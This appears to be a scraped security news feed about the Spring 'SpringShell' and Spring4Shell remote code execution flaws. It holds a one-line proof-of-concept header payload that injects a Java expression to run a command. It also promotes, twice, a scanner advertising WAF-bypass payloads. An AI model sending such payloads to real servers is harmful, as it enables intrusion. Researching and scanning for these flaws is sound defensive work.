APT
SpringShell: Spring Core RCE (CVE-2022-22963) PoC Payload: spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc") Research: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html Exploit: https:/…
Spring4Shell Scan
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.
https://github.com/fullhunt/spring4shell-scan
#spring4shell #spring #scan #tools
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
Features:
— Support for lists of URLs.
— Fuzzing for more than 10 new Spring4Shell payloads (previously seen tools uses only 1-2 variants).
— Fuzzing for HTTP GET and POST methods.
— Automatic validation of the vulnerability upon discovery.
— Randomized and non-intrusive payloads.
— WAF Bypass payloads.
https://github.com/fullhunt/spring4shell-scan
#spring4shell #spring #scan #tools
GitHub
GitHub - fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud…
A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities - fullhunt/spring4shell-scan